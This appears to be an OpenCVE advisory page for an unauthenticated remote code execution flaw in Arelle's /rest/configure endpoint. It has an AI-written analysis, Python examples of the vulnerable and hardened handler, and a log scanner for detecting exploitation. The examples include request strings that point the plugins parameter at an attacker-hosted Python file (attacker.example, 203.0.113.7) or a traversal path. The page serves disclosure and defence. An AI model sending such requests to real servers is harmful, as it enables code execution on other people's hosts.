Description
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
Published: 2026-05-04
Score: 9.2 Critical
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Arelle versions earlier than 2.39.10 expose an unauthenticated remote code execution flaw in the /rest/configure REST endpoint of Arelle's built-in web server. The endpoint accepts a plugins query parameter and forwards its value, unchecked, to the plugin manager; because the plugin manager accepts a URL as a plugin source, an attacker can point it at a Python file they control. The web server downloads and executes that file with the privileges of the Arelle process, so the attacker obtains arbitrary code execution as the server's user, with full impact on the confidentiality, integrity and availability of the host. The record classifies the root cause as CWE-306 (Missing Authentication for Critical Function): the defect is the absence of authentication and authorization on a function that loads and runs code, not a parsing bug in the parameter.
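To make the flaw concrete, the following added example (not Arelle's code; a hypothetical reconstruction of the pattern the description gives) shows a minimal /rest/configure handler that forwards the plugins value to a plugin manager without checking who is calling or what the value is, beside a hardened variant that requires a caller token and accepts only bare, allowlisted plugin names. The plugin manager is a recording stub: instead of importing anything it notes which specs would have been fetched and executed. The '|' separator, the leading '+' add marker, the token check and the allowlist names are assumptions for illustration.

```python
import hmac
import re
from urllib.parse import parse_qs, urlparse


class RecordingPluginManager:
    """Stand-in for a plugin manager (assumption: not Arelle's real class).

    Records what a handler asked it to load instead of importing anything, and
    mirrors the behaviour the advisory describes: a URL spec would be fetched
    and executed inside the process, so those are tracked separately.
    """

    def __init__(self):
        self.loaded = []        # every spec a handler forwarded
        self.fetched_urls = []  # specs that would trigger download-and-execute

    def add_plugin_module(self, spec):
        if spec.lower().startswith(("http://", "https://")):
            self.fetched_urls.append(spec)
        self.loaded.append(spec)
        return spec


def _plugin_items(query_string):
    """Split the plugins query value into individual specs.

    Assumption: '|' separates entries and a leading '+' marks an addition.
    strip() matters because parse_qs turns an unencoded '+' into a space.
    """
    items = []
    for value in parse_qs(query_string).get("plugins", []):
        for item in value.split("|"):
            item = item.strip()
            if item.startswith("+"):
                item = item[1:]
            if item:
                items.append(item)
    return items


def vulnerable_configure(query_string, manager):
    """The flawed pattern: no caller identity, spec forwarded exactly as received."""
    return [manager.add_plugin_module(spec) for spec in _plugin_items(query_string)]


# Plugin names the operator has approved (assumed names, for illustration only).
ALLOWED_PLUGINS = frozenset({"validate/EFM", "saveLoadableOIM"})
_LOCAL_NAME = re.compile(r"^[A-Za-z0-9_]+(?:/[A-Za-z0-9_]+)*$")


def hardened_configure(query_string, manager, presented_token, expected_token):
    """Same entry point with the two missing controls added.

    1. Authentication: a shared token compared in constant time (assumption:
       how this deployment identifies callers; any real auth scheme works).
    2. Input restriction: only bare, allowlisted plugin names. Anything with a
       URL scheme, a leading path separator or '..' is refused, so the manager
       can never be pointed at attacker-controlled code.
    """
    if not presented_token or not hmac.compare_digest(presented_token, expected_token):
        raise PermissionError("authentication required for /rest/configure")
    accepted = []
    for spec in _plugin_items(query_string):
        if urlparse(spec).scheme or spec.startswith(("/", "\\", ".", "~")):
            raise ValueError(f"refusing remote or path-based plugin spec: {spec!r}")
        if not _LOCAL_NAME.fullmatch(spec) or spec not in ALLOWED_PLUGINS:
            raise ValueError(f"plugin not on allowlist: {spec!r}")
        accepted.append(manager.add_plugin_module(spec))
    return accepted


if __name__ == "__main__":
    weak = RecordingPluginManager()
    vulnerable_configure("plugins=http://attacker.example/evil.py", weak)
    print("vulnerable handler would fetch and run:", weak.fetched_urls)
    strong = RecordingPluginManager()
    print("hardened handler accepted:",
          hardened_configure("plugins=validate/EFM", strong, "s3cret", "s3cret"))
```

The allowlist check is what closes the hole even if authentication is later misconfigured: a code-loading endpoint should never accept a network location from its caller, only a name resolved against modules already installed on the host.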

Affected Systems

The affected product is Arelle, all releases before 2.39.10. A deployment is exposed only if the /rest/configure endpoint is reachable by untrusted clients, which requires Arelle to be running its built-in web server (started with the --webserver command-line option); batch command-line runs that never start the web server expose no REST endpoints. Treat any instance whose web server listens on a non-loopback interface, or sits behind a proxy that adds no authentication of its own, as affected.

Risk and Exploitability

The vulnerability carries a CVSS v4.0 base score of 9.2 (Critical; vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) and a CVSS v3.1 score of 9.8. The v4 vector's AT:P (attack requirements present) most plausibly reflects a deployment precondition, namely that the built-in web server is running and reachable; beyond that, no authentication, user interaction or privilege escalation step is needed. The SSVC assessment recorded in the history below rates it Automatable: yes with Technical Impact: total, while Exploitation: none, the missing EPSS data and the absence of a KEV listing mean only that no exploitation has been observed yet, not that the risk is lower. The attack is a single HTTP request to /rest/configure with a plugins parameter carrying a URL under the attacker's control, after which the server fetches and runs the referenced Python code inside the Arelle process.
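Because the attack is a single request, the most useful detection is a scan of web server access logs for /rest/configure calls whose plugins value names a URL, an absolute or UNC path, or a parent-directory traversal rather than a bare plugin name. The example below is added here and is not part of the OpenCVE record or the Arelle project; it parses constructed combined-format log lines (sample data, not a real capture), decodes the query string, and returns one finding per suspicious request. The '|' separator and the '+'/'~' add/remove markers in the plugins value are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log in combined format; not a real capture.
SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2026:18:20:01 +0000] "GET /rest/configure?plugins=http://203.0.113.7/evil.py HTTP/1.1" 200 512
203.0.113.7 - - [04/May/2026:18:20:02 +0000] "GET /rest/configure?plugins=%2Bhttps%3A%2F%2F203.0.113.7%2Fp.py HTTP/1.1" 200 512
10.0.0.5 - - [04/May/2026:18:21:00 +0000] "GET /rest/configure?plugins=show HTTP/1.1" 200 300
10.0.0.5 - - [04/May/2026:18:22:00 +0000] "GET /rest/xbrl/validation?file=report.xbrl HTTP/1.1" 200 9000
198.51.100.9 - - [04/May/2026:18:23:00 +0000] "GET /rest/configure?plugins=..%2F..%2Ftmp%2Fx.py HTTP/1.1" 404 0
"""

LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# A spec that names a URL, a UNC or absolute path, or a parent traversal rather
# than a bare plugin name. Leading '+'/'~' are assumed add/remove markers.
REMOTE_SPEC = re.compile(r"(?i)^\s*[+~]?\s*(?:[a-z][a-z0-9+.\-]*://|//|\\\\|/|\.\.)")


def classify_target(target):
    """Return a finding reason for one request target, or None if not of interest."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/rest/configure":
        return None
    specs = parse_qs(parts.query, keep_blank_values=True).get("plugins", [])
    if not specs:
        return None
    for value in specs:
        # parse_qs decoded once; unquote again in case the client double-encoded.
        for item in unquote(value).split("|"):
            if REMOTE_SPEC.match(item):
                return f"remote or path plugin spec: {item.strip()}"
    # Any use of the plugins parameter on an unauthenticated endpoint is worth
    # a look, even when the value is a plain name.
    return "plugins parameter used on unauthenticated endpoint"


def scan_access_log(text):
    """Return a list of findings (dicts) for suspicious /rest/configure requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reason = classify_target(m["target"])
        if reason is None:
            continue
        findings.append({
            "src": m["src"], "ts": m["ts"], "status": m["status"],
            "target": m["target"], "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['status']} {f['reason']}")
```

A 404 on such a request is not reassuring on its own (the sample's last line): the server may have fetched and executed the file before failing to register it as a plugin, so a hit from an untrusted source should be handled as a suspected compromise of that host rather than a blocked attempt.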

Generated by OpenCVE AI on May 4, 2026 at 18:53 UTC.

Remediation

No vendor fix or workaround is recorded on this page. The description itself identifies 2.39.10 as the first unaffected release, so upgrading to that version or later is the fix.

OpenCVE Recommended Actions

  • Upgrade Arelle to version 2.39.10 or later, the first release the description identifies as unaffected.
  • Until the upgrade is applied, make /rest/configure unreachable from untrusted networks: bind the Arelle web server to a loopback or private interface, or block the endpoint with firewall rules, network segmentation or an authenticating reverse proxy.
  • Run the Arelle web server under a dedicated, low-privilege account, since any code loaded through the endpoint executes with that process's privileges.
  • Review plugin configurations and the modules actually loaded at runtime: enable only trusted, locally installed plugins and remove any entry that references an external URL. Check web server access logs for requests to /rest/configure whose plugins value contains a URL, and treat a hit from an untrusted source as a potential compromise of that host.


Advisories

No advisories yet.

History

Mon, 04 May 2026 21:15:00 +0000

Type | Values Removed | Values Added
Metrics | - | ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Mon, 04 May 2026 20:15:00 +0000

Type | Values Removed | Values Added
First Time appeared | - | Arelle (vendor), Arelle arelle (product)
Vendors & Products | - | Arelle (vendor), Arelle arelle (product)

Mon, 04 May 2026 17:45:00 +0000

Type | Values Removed | Values Added
Description | - | Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
Title | - | Arelle < 2.39.10 Unauthenticated RCE via /rest/configure
Weaknesses | - | CWE-306
References | - | (none listed)
Metrics | - | cvssV3_1 {'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}
Metrics | - | cvssV4_0 {'score': 9.2, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-04T20:21:36.238Z

Reserved: 2026-04-29T20:58:22.764Z

Link: CVE-2026-42796

Vulnrichment

Updated: 2026-05-04T20:21:32.628Z

NVD

Status : Received

Published: 2026-05-04T18:16:32.520

Modified: 2026-05-04T18:16:32.520

Link: CVE-2026-42796

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-04T19:43:52Z

Weaknesses